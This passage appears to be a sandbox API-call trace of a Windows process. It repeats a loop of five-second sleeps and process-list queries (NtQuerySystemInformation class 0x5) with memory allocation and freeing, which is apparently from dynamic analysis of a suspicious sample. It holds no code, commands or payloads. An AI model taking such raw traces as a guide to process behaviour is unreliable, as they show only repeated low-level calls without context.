NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.653] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.681] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.707] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.759] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.768] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 